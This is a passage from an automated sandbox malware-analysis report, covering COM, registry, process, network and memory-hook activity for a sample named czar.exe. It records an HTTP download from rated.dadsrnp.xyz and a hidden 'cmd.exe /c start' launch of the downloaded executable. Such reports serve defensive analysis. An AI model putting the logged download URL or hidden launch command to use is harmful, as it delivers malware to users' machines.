Create	WbemDefaultPathParser	IWbemPath	cls_context = CLSCTX_INPROC_SERVER	3	Fn
Create	WinHTTP.WinHTTPRequest.5.1	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	Scripting.FileSystemObject	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	2	Fn
Create	ADODB.Stream	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	Shell.Application	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Execute	WinHTTP.WinHTTPRequest.5.1	IDispatch	method_name = Open	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\.\root\cimv2	1	Fn

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting	value_name = Default Impersonation Level, data = 3	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting	value_name = Default Namespace	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting	value_name = Default Namespace, data = 114	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	cmd.exe /c start C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe	os_pid = 0x9dc, show_window = SW_HIDE		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Load	ole32.dll	base_address = 0x776c0000	1	Fn
Load	C:\Windows\system32\advapi32.dll	base_address = 0x760e0000	1	Fn
Get Address	Unknown module name	function = CoCreateInstance, address_out = 0x77709d0b	1	Fn
Get Address	Unknown module name	function = CreateBindCtx, address_out = 0x77706d2c	1	Fn
Get Address	Unknown module name	function = MkParseDisplayName, address_out = 0x776ccea9	1	Fn
Get Address	Unknown module name	function = DuplicateTokenEx, address_out = 0x760eca24	1	Fn
Get Address	Unknown module name	function = BindMoniker, address_out = 0x776cc6a7	1	Fn
Get Address	Unknown module name	function = CoGetClassObject, address_out = 0x776f54ad	1	Fn

System (461)

Operation	Additional Information	Count	Logfile
Get Time	type = Ticks, time = 96658	1	Fn
Get Time	type = Ticks, time = 96814	4	Fn
Get Time	type = Ticks, time = 96829	1	Fn
Get Time	type = Ticks, time = 96845	2	Fn
Get Time	type = Ticks, time = 96861	2	Fn
Get Time	type = Ticks, time = 96876	2	Fn
Get Time	type = Ticks, time = 96892	2	Fn
Get Time	type = Ticks, time = 96907	4	Fn
Get Time	type = Local Time, time = 2018-04-24 20:30:47 (Local Time)	1	Fn
Get Time	type = Ticks, time = 96923	1	Fn
Get Time	type = Ticks, time = 97859	2	Fn
Get Time	type = Ticks, time = 97999	2	Fn
Get Time	type = Ticks, time = 98015	5	Fn
Get Time	type = Ticks, time = 98031	4	Fn
Get Time	type = Ticks, time = 98046	2	Fn
Get Time	type = Ticks, time = 98062	5	Fn
Get Time	type = Ticks, time = 98077	14	Fn
Get Time	type = Ticks, time = 98093	13	Fn
Get Time	type = Ticks, time = 98109	14	Fn
Get Time	type = Ticks, time = 98124	14	Fn
Get Time	type = Ticks, time = 98140	13	Fn
Get Time	type = Ticks, time = 98155	15	Fn
Get Time	type = Ticks, time = 98171	14	Fn
Get Time	type = Ticks, time = 98187	7	Fn
Get Time	type = Ticks, time = 98202	13	Fn
Get Time	type = Ticks, time = 98218	15	Fn
Get Time	type = Ticks, time = 98233	14	Fn
Get Time	type = Ticks, time = 98249	14	Fn
Get Time	type = Ticks, time = 98265	15	Fn
Get Time	type = Ticks, time = 98280	15	Fn
Get Time	type = Ticks, time = 98296	45	Fn
Get Time	type = Ticks, time = 98311	80	Fn
Get Time	type = Ticks, time = 98327	95	Fn
Get Time	type = Ticks, time = 98343	7	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Set Environment String	name = SystemRoot, value = C:\Windows		1	Fn

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	331 bytes
Total Data Received	274.00 KB
Contacted Host Count	1
Contacted Hosts	rated.dadsrnp.xyz

HTTP Session #1

Information	Value
Used COM interface	WinHTTP.WinHTTPRequest.5.1
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	rated.dadsrnp.xyz
Server Port	80
Data Sent	331
Data Received	280576

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = rated.dadsrnp.xyz, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /8/7305	1	Fn
Send HTTP Request	url = http://rated.dadsrnp.xyz/8/7305	1	Fn
Receive HTTP Status	status = 200	1	Fn
Read Response	size_out = 280576	1	Fn Data

Process #5: cmd.exe

Information	Value
ID	#5
File Name	c:\windows\syswow64\cmd.exe
Command Line	cmd.exe /c start C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:00:36, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:51

OS Process Information

Information	Value
PID	0x9dc
Parent PID	0x8d4 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	-
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	-
private_0x0000000000200000	0x00200000	0x0020ffff	Private Memory	Readable, Writable	-
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000320000	0x00320000	0x004a7fff	Pagefile Backed Memory	Readable	-
private_0x0000000000510000	0x00510000	0x0058ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000590000	0x00590000	0x00710fff	Pagefile Backed Memory	Readable	-
private_0x0000000000780000	0x00780000	0x0087ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000880000	0x00880000	0x01c7ffff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000001c80000	0x01c80000	0x01fc2fff	Pagefile Backed Memory	Readable	-
cmd.exe	0x4ac30000	0x4ac7bfff	Memory Mapped File	Readable, Writable, Executable	-
winbrand.dll	0x71ba0000	0x71ba6fff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-

Host Behavior

File (13)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\5P5NRG~1\AppData\Local\Temp	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	6	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe	os_pid = 0xa38, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Thread (1)

Operation	Process	Additional Information	Success	Count	Logfile
Resume	c:\windows\syswow64\cmd.exe	os_tid = 0x9e0		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x4ac30000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75fd0000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ffa84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x76003b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75fe4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x75ffa79d	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-04-24 10:30:49 (UTC)		1	Fn
Get Time	type = Ticks, time = 99107		1	Fn

Environment (12)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp	1	Fn

Process #6: czar.exe

486

Information	Value
ID	#6
File Name	c:\users\5p5nrg~1\appdata\local\temp\czar.exe
Command Line	C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe
Initial Working Directory	C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor	Start Time: 00:00:36, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:09:51

OS Process Information

Information	Value
PID	0xa38
Parent PID	0x9dc (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A3C 0x A80 0x A84

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	-
private_0x0000000000210000	0x00210000	0x0022ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000210000	0x00210000	0x00216fff	Pagefile Backed Memory	Readable	-
private_0x0000000000220000	0x00220000	0x0022ffff	Private Memory	Readable, Writable	-
private_0x0000000000230000	0x00230000	0x0023ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x00275fff	Private Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x0028ffff	Private Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000250000	0x00250000	0x00256fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000260000	0x00260000	0x00266fff	Pagefile Backed Memory	Readable, Writable	-
svchost.exe	0x00260000	0x00265fff	Memory Mapped File	Readable	-
pagefile_0x0000000000290000	0x00290000	0x00291fff	Pagefile Backed Memory	Readable	-
msctf.dll.mui	0x00290000	0x00290fff	Memory Mapped File	Readable, Writable	-
private_0x00000000002a0000	0x002a0000	0x0031ffff	Private Memory	Readable, Writable	-
kernelbase.dll.mui	0x00320000	0x003dffff	Memory Mapped File	Readable, Writable	-
pagefile_0x00000000003e0000	0x003e0000	0x003e1fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	Readable	-
czar.exe	0x00400000	0x09217fff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000009220000	0x09220000	0x092fffff	Private Memory	Readable, Writable	-
private_0x0000000009220000	0x09220000	0x092affff	Private Memory	Readable, Writable	-
private_0x0000000009220000	0x09220000	0x0925ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000009260000	0x09260000	0x09261fff	Pagefile Backed Memory	Readable	-
private_0x00000000092a0000	0x092a0000	0x092affff	Private Memory	Readable, Writable	-
private_0x00000000092c0000	0x092c0000	0x092fffff	Private Memory	Readable, Writable	-
private_0x0000000009320000	0x09320000	0x0941ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000009420000	0x09420000	0x095a7fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000095b0000	0x095b0000	0x09730fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000009740000	0x09740000	0x0ab3ffff	Pagefile Backed Memory	Readable	-
pagefile_0x000000000ab40000	0x0ab40000	0x0ac1efff	Pagefile Backed Memory	Readable	-
sortdefault.nls	0x0ac20000	0x0aeeefff	Memory Mapped File	Readable	-
private_0x000000000aef0000	0x0aef0000	0x0afeffff	Private Memory	Readable, Writable	-
private_0x000000000aff0000	0x0aff0000	0x0b0effff	Private Memory	Readable, Writable	-
private_0x000000000b0f0000	0x0b0f0000	0x0b1effff	Private Memory	Readable, Writable	-
private_0x000000000b1f0000	0x0b1f0000	0x0b26ffff	Private Memory	Readable, Writable	-
msvcr100.dll	0x71af0000	0x71baefff	Memory Mapped File	Readable, Writable, Executable	-
dwmapi.dll	0x75620000	0x75632fff	Memory Mapped File	Readable, Writable, Executable	-
uxtheme.dll	0x75640000	0x756bffff	Memory Mapped File	Readable, Writable, Executable	-
wow64cpu.dll	0x756d0000	0x756d7fff	Memory Mapped File	Readable, Writable, Executable	-
wow64win.dll	0x756e0000	0x7573bfff	Memory Mapped File	Readable, Writable, Executable	-
wow64.dll	0x75740000	0x7577efff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x75980000	0x7598bfff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x75990000	0x759effff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x75a30000	0x75a48fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x75bb0000	0x75bf5fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x75fd0000	0x760dffff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x760e0000	0x7617ffff	Memory Mapped File	Readable, Writable, Executable	-
shlwapi.dll	0x76180000	0x761d6fff	Memory Mapped File	Readable, Writable, Executable	-
lpk.dll	0x763c0000	0x763c9fff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x763e0000	0x764dffff	Memory Mapped File	Readable, Writable, Executable	-
oleaut32.dll	0x764e0000	0x7656efff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x76670000	0x7671bfff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x76720000	0x767ebfff	Memory Mapped File	Readable, Writable, Executable	-
clbcatq.dll	0x76890000	0x76912fff	Memory Mapped File	Readable, Writable, Executable	-
shell32.dll	0x76920000	0x77569fff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x77570000	0x775cffff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x775d0000	0x776bffff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x776c0000	0x7781bfff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x77820000	0x778affff	Memory Mapped File	Readable, Writable, Executable	-
usp10.dll	0x77990000	0x77a2cfff	Memory Mapped File	Readable, Writable, Executable	-
private_0x0000000077a30000	0x77a30000	0x77b4efff	Private Memory	Readable, Writable, Executable	-
private_0x0000000077b50000	0x77b50000	0x77c49fff	Private Memory	Readable, Writable, Executable	-
ntdll.dll	0x77c50000	0x77df8fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x77e30000	0x77faffff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	-

Hook Information

Type	Installer	Target	Size	Information	Actions
Code	private_0x0000000009320000:+0x13a14	czar.exe:+0x1000	54.00 KB	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a14	czar.exe:+0xf17c	3.63 KB	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1000	11 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x100c	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x100f	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1014	11 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1020	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1023	9 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x102d	11 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1039	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x103c	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1041	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1049	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x104e	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1051	9 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x105b	16 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x106c	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x106f	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1074	12 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1082	7 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x108a	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x108d	9 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1097	11 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10a3	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10a6	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10ab	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10b3	4 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10b8	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10bb	9 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10c5	18 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x10db	37 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1101	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1104	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x110a	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x110d	1 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1112	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x111a	15 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
